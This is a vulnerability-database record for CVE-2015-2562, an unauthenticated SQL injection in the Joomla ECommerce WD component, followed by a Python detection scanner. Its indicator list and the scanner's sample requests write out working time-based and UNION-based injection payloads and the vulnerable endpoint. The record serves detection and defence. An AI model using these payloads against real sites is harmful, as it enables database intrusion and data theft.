cbcvebase.
CVE-2015-2562
published 2015-03-20

Priority: P2 (66, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 38.95% (98.4th percentile)
Multiple SQL injection vulnerabilities in the Web-Dorado ECommerce WD (com_ecommercewd) component 1.2.5 for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) search_category_id, (2) sort_order, or (3) filter_manufacturer_ids in a displayproducts action to index.php.

Affected (1 range)

Vendor: web-dorado
Product: ecommerce_wd
Version range: not listed
Fixed in: not listed

Detection & IOCs (extracted from sources)

url: /index.php?option=com_ecommercewd&controller=products&task=displayproducts
command: filter_manufacturer_ids=1) AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND (1480=1480
command: search_category_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND (1251=1251
command: search_category_id=1) UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--
command: sort_order=asc,(SELECT (CASE WHEN (6064=6064) THEN SLEEP(5) ELSE 6064*(SELECT 6064 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
bytes: 0x71786a6b71
  • Monitor POST requests to /index.php with query parameters option=com_ecommercewd, controller=products, and task=displayproducts. Inspect POST body for SQL injection patterns in search_category_id, sort_order, and filter_manufacturer_ids parameters.
  • Detect UNION-based SQLi by alerting on UNION ALL SELECT CONCAT with hex-encoded boundary markers (0x71786a6b71, 0x71706a6a71) in POST body to com_ecommercewd endpoints.
  • A Metasploit auxiliary scanner module exists for this vulnerability; scan logs for automated exploitation attempts against the displayproducts action.
  • The vulnerability is unauthenticated — no session or login is required to exploit it, meaning perimeter authentication controls alone are insufficient.
  • Version 1.2.5 is confirmed vulnerable; prior versions are also likely affected per the Metasploit module description.
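The detection guidance above, as an added example that is not part of the cbcvebase record or the component's code: a small Python scanner that first scopes a request to the displayproducts action and then checks the three named parameters of the POST body for the patterns shown in the IOC list. The sample requests are constructed, and the rule names and helper functions are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Only requests selecting the displayproducts action (the url IOC above) are inspected.
TARGET_QUERY = {"option": "com_ecommercewd", "controller": "products", "task": "displayproducts"}
WATCHED_PARAMS = ("search_category_id", "sort_order", "filter_manufacturer_ids")

# Detection rules derived from the command and bytes IOCs listed above.
SQLI_RULES = {
    "union_select": re.compile(r"union\s+all\s+select", re.I),
    "time_based_sleep": re.compile(r"\bsleep\s*\(", re.I),
    "hex_boundary_marker": re.compile(r"0x71786a6b71|0x71706a6a71", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
    "paren_escape": re.compile(r"^\s*\d+\s*\)\s*(and|or|union)\b", re.I),  # "1) AND ..."
}

def is_target_request(path_with_query: str) -> bool:
    """True when path and query select the vulnerable displayproducts action."""
    parts = urlsplit(path_with_query)
    if parts.path != "/index.php":
        return False
    qs = parse_qs(parts.query)
    return all(qs.get(key, [None])[0] == value for key, value in TARGET_QUERY.items())

def scan_request(path_with_query: str, body: str) -> dict:
    """Return {parameter: [rule names]} for watched body parameters matching a rule.
    The body is parsed as a URL-encoded form (percent-encoding decoded); non-target requests return {}."""
    if not is_target_request(path_with_query):
        return {}
    findings = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        if param not in WATCHED_PARAMS:
            continue
        hits = {name for value in values for name, rx in SQLI_RULES.items() if rx.search(value)}
        if hits:
            findings[param] = sorted(hits)
    return findings

# Constructed sample requests (not real log data): a benign request, the time-based
# and UNION payloads from the IOC list, and a payload aimed at another component.
TARGET = "/index.php?option=com_ecommercewd&controller=products&task=displayproducts"
SAMPLE_REQUESTS = [
    (TARGET, "search_category_id=3&sort_order=asc"),
    (TARGET, "filter_manufacturer_ids=1) AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND (1480=1480"),
    (TARGET, "search_category_id=1) UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--"),
    ("/index.php?option=com_content&view=article", "search_category_id=1) AND (SELECT SLEEP(5))"),
]

def scan_samples() -> list:
    """Run every sample through scan_request; one findings dict per request."""
    return [scan_request(path, body) for path, body in SAMPLE_REQUESTS]
```

Feeding real access-log or WAF request records into scan_request gives one findings dict per request; an empty dict means either the request did not target the displayproducts action or none of the watched parameters matched a rule.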